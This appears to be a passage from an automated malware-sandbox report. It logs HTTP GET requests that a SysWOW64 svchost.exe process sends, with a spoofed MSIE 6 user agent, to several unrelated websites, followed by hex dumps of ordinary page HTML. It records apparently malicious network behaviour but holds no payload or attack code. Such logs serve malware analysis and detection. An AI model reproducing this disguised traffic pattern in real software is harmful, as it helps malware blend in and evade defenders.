                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:26 UTC49INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                      Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      10192.168.2.55027449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC68OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      11192.168.2.55031935.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC116OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC117INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:36 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      SG-F-Cache: HIT
                                                                                                                                                                                                                                                                                                      X-Httpd-Modphp: 1
                                                                                                                                                                                                                                                                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                                      X-Proxy-Cache: HIT
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC117INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC133INData Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69
                                                                                                                                                                                                                                                                                                      Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC149INData Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d
                                                                                                                                                                                                                                                                                                      Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC165INData Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69
                                                                                                                                                                                                                                                                                                      Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC181INData Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      12192.168.2.550328104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:36 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Set-Cookie: d55e479f054c94814cbc10d217aaa990=e54cc20c1d7fdf3749e95c6556111923; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:44:36 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BHHL18NSWNhPBQQbT3I%2FqYTetps7Q2N2bM01O0TWaSM5IDU8RHu%2BuLNPdZ9ePOXTIWa8JRZFNHktveYnS07UGcO4O6ZqvLGEFLxEoksM99bOCOIX8%2BKDs8YDusylhGFSaEI62YkP2xk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc7c6daae3a6d-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC184INData Raw: 37 63 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 7c50<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC184INData Raw: 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: ref="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC186INData Raw: 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74
                                                                                                                                                                                                                                                                                                      Data Ascii: dia/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC187INData Raw: 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: s/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC188INData Raw: 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22
                                                                                                                                                                                                                                                                                                      Data Ascii: clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC190INData Raw: 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                                                      Data Ascii: item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC191INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65
                                                                                                                                                                                                                                                                                                      Data Ascii: g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-containe
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC192INData Raw: 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                                                      Data Ascii: /nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-ite
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC194INData Raw: 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70
                                                                                                                                                                                                                                                                                                      Data Ascii: enu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-drop
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:36 UTC195INData Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu
